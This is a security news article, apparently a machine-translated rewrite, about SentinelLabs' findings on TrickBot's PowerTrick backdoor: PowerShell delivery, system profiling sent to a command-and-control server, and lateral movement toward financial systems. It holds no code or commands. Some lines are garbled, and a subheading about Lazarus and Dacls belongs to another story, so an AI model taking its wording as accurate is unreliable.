TrickBot hackers create a new covert back door for valuable goals

Researchers suspect that Lazarus is developing his own Dacls trojan
The Trojan can infect both Windows and Linux machines.

The infamous TrickBot cyber attack group has developed a new back door to track valuable victim systems after exploitation.

After Synchronized PowerTrick, the ultimate goal of the post-exploitation tool is to “bypass restrictions and security controls to adapt to the new era of security controls and exploit the most protected and secure high-quality networks,” SentinelLabs researchers Vitali Kremez, Joshua Platt and Jason Reaves said on Thursday.

TrickBot cyber criminals specialize in theft of bank details worldwide, often from companies. Trojans associated with the group are constantly evolving, with new modules and tools in development to stay one step ahead of IT teams and to perform both data exfiltration and persistence.

Also see: TrickBot, today’s best trojan, adds a feature to help SIM swapping attacks

In the second half of last year, researchers warned that in addition to powerful Trojan horses, back doors and web injection techniques, developers have expanded their arsenal with tools designed for SIM swapping attacks. TrickBot malware is also linked to theft based on cryptocurrency.

The new tool was probably launched via Windows PowerShell, the researchers say. A new TrickBot module called “NewBCtest” has been modified to accept execution commands, including the creation of a larger back door further down the attack chain.

SentinelLabs says that the method used is similar to the open source PowerShell Empire, but to stay secret, TrickBot has chosen to design PowerTrick so that it is “flexible” and can be expanded “on the spot”. ”

CNET: Drone swarms in 3 states prompt FAA, FBI investigation of mystery

Scans are performed to profile the infected system and information is returned along with a unique user ID, which is sent through the back door to a command and control (C2) server that is managed by the attackers.

PowerTrick will also use the Metasploit exploitation framework and various PowerShell utilities to run to network drives and systems, implement additional malware and perform cleanup and detonation tasks.

TechRepublic: CES 2020: How McAfee’s Just in Time stops cyber criminals debugger

“They remove existing files that have not been executed correctly and move to another destination of their choice or perform lateral movements within the environment to high-quality systems such as financial gateways,” the team says.

It is this sideways movement that must concern businesses. As we have seen with the recent Travelex incident, malware that can spread and encrypt – or steal – data can prove disastrous in a network environment.

TrickBot has also recently been connected to “Anchor”, a toolset that seems to provide a link between operators and North Korean hacking groups.

Previous and related coverage

Do you have a tip? Contact us securely via WhatsApp | Signal on +447713 025 499 or higher on Keybase: charlie0